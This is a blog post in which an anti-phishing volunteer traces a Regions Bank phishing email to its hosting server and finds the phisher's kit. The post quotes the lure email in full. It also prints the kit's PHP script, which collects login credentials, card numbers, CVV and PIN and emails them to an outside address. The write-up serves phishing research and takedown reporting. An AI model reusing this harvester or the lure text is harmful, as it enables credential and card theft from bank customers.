Walking through a phish site.

I just received this email in my inbox and figured some readers would enjoy some light reading.

Online Banking

Dear Regions Bank member,


We'd like to inform you that your Message Center has 1 new message. Please log in immediately and read the message. The Message Center contains only important information about your account and online banking.

Please follow this link in order to read your message:

http://tinyurl.com/2qzwsr

Choosing to ignore this message will result in a temporary suspension of your account within 24 hours, until you will choose to solve this unpleasant situation.

Sincerely,
RegionsNet Online Banking

All of my phish emails go to CastleCops, and I enjoy helping them out by doing the first bit of research on my own. I started by figuring out where the TinyURL is pointing. You can do this by setting a cookie "preview=1" before visiting the page, fetching the page with wget, or running a proxy like Paros or WebScarab. According to TinyURL, the 2qzwsr redirect points to "http:// backup.iirt .net/ icons/ www.regions bank.com/ EBanking/ logon/" where we are greeted with:


Now phishers aren't the brightest bunch. In fact the majority of them are down right stupid. By backing up a few directories, we're able to find an open index. It was probably accidentally left open by the web master. The stupid part is, the phisher didn't even bother to remove his kit: "http://backup. iirt.net/ icons/ regions.tgz"

In the archive we find: /www.regionsbank.com/EBanking/logon/done.php:

session_start();

$j_username = $_SESSION['j_username'];
$j_password = $_SESSION['j_password'];
$name = $HTTP_POST_VARS['name'];
$address = $HTTP_POST_VARS['address'];
$city = $HTTP_POST_VARS['city'];
$state = $HTTP_POST_VARS['state'];
$zip = $HTTP_POST_VARS['zip'];
$p1 = $HTTP_POST_VARS['p1'];
$p2 = $HTTP_POST_VARS['p2'];
$p3 = $HTTP_POST_VARS['p3'];
$card = $HTTP_POST_VARS['card'];
$expm = $HTTP_POST_VARS['expm'];
$expy = $HTTP_POST_VARS['expy'];
$cvv = $HTTP_POST_VARS['cvv'];
$pin = $HTTP_POST_VARS['pin'];
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$date = date("D M d, Y g:i a");

//sending email info here
$subj = "| CC: $card | EXP: $expm/$expy | CVV: $cvv | PIN: $pin |";
$msg = "Username: $j_username\nPassword: $j_password\nCardHolder Name: $name\nAddress: $address\nCity: $city\nState: $state\nZip: $zip\nPhone Number: $p1-$p2-$p3\nCredit Card Number: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin: $pin\n\n[ IP: $ip | $date ]";
$from = "From: Regions Bank";
mail("peacolo3@yahoo.com", $subj, $msg, $from);
header("Location: http://www.regions.com");

?>

So victim data is emailed to peacolo3@yahoo.com. We could send Mr Peacolo a nice email, but that could be considered baiting him...and we'd never do that..right? :)

Emails were sent to hostmaster@iirt.net and the phish was forwarded to CastleCops.

So grab your line, and go anti-phishing. -- For what its worth, TinyURL killed the site while I was writing this. Good job TinyURL.